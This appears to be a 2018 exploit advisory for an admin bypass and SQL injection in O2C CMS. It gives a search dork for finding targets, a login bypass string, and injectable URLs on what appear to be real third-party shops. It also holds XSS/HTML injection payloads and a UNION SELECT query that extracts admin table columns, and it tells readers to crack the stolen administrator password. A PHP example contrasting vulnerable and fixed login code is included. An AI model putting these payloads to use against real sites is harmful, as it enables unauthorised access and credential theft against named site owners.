
O2C cms admin bypass Vulnerability

Author: Rednofozi, Published: 20-07-2018
# From Title : O2C cms admin bypass Vulnerability
# To Title : O2C cms sql injection in administrator.
# by rednofozi
# Tested on: Windows, and many variations of linux.
# google dork: intext:"powered by O2C"


# Vulnerability

Previously, while reading up on exploits, I came across the O2C CMS admin bypass.
Log in with '=' 'or' as both the username and the password.
Then go to any section and click to edit a field; you will get something like this:
http://bandung-onlineshop.com/admin/category.php?act=edit&id=11'
http://www.endiraalda.com/admin/shop.php?act=edit&id=35'

# Error:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/endldcom/public_html/admin/modules/org.distributor.inc.php on line 298
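The warning above is what a query built by string concatenation produces when the injected quote breaks the SQL and the false result is handed straight to the fetch call. As an added illustration (not O2C's own code), the following shows a login check written the way the advisory's bypass requires beside a hardened version with prepared statements, hashed passwords and integer validation of the `id` parameter; it assumes a PDO connection `$pdo` and the table name `tbladmin` from the advisory.

```php
<?php
// Added example, not O2C CMS code. Assumes a PDO connection to MySQL and the
// table tbladmin(username, password) named in the advisory.

// VULNERABLE: request values are spliced into the SQL text. With the advisory's
// value '=' 'or' in both fields the clause becomes username=''='' 'or' ...;
// MySQL concatenates the adjacent literals and the comparison collapses to
// 0 = 0, so every admin row matches without any stored credential being known.
function login_vulnerable(PDO $pdo, string $user, string $pass): bool
{
    $sql = "SELECT id FROM tbladmin WHERE username='$user' AND password='$pass'";
    $stmt = $pdo->query($sql);              // false on a broken query
    return $stmt !== false && $stmt->fetch(PDO::FETCH_ASSOC) !== false;
}

// FIXED: the prepared statement keeps input as data, and the password is
// checked with password_verify() against a password_hash() value, so a leaked
// tbladmin row no longer hands an attacker a reusable cleartext password.
function login_fixed(PDO $pdo, string $user, string $pass): bool
{
    $stmt = $pdo->prepare('SELECT password FROM tbladmin WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($pass, $row['password']);
}

// FIXED: the id in category.php?act=edit&id=... is validated as a positive
// integer before it reaches the database, and the result is checked instead
// of being passed blindly to a fetch call (the cause of the warning above).
function load_category(PDO $pdo, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                        // "11'" and similar junk stop here
    }
    $stmt = $pdo->prepare('SELECT * FROM category WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```

Enabling `PDO::ERRMODE_EXCEPTION` on the connection additionally turns the silent false return in the vulnerable path into an exception that can be logged and alerted on.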

# Review:

After successfully exploiting the vulnerability, I came upon tbladmin in the database.
tbladmin contains the username and password for the administrator, as you should well know.
Once you have it, crack the password, and you no longer need '=' 'or' and '=' 'or'.

# Demos:

http://www.endiraalda.com/admin/distributor.php?act=edit&id=39%27
http://bandung-onlineshop.com/admin/category.php?act=edit&id=11

# Other exploitable points in these sites:
SQL Injection: http://bandung-onlineshop.com/product.php?idc=11'
http://bandung-onlineshop.com/search.php (In the search field there is XSS & HTML injection; try putting this in it: <font color="red"><h1>@RapidDisclosure<img src="http://i59.tinypic.com/33ws84x.jpg"> )
HTML Injection/XSS & SQL Injection: http://www.endiraalda.com/product.php?view=%23&kat=-1%20and%201=2%20union%20all%20select%201,database(),group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x74626c5f61646d696e--%20%3Cfont%20color=%22red%22%3E%3Cp+align%3D%22center%22%3E@RapidDisclosure%3C%2Fp%3E%3Cimg%20src=%22http://media.bestofmicro.com/J/K/399872/gallery/binary-eyes-shst-130906_w_500.jpg%22%3E

# Rednofozi iran cyber team welove sistan
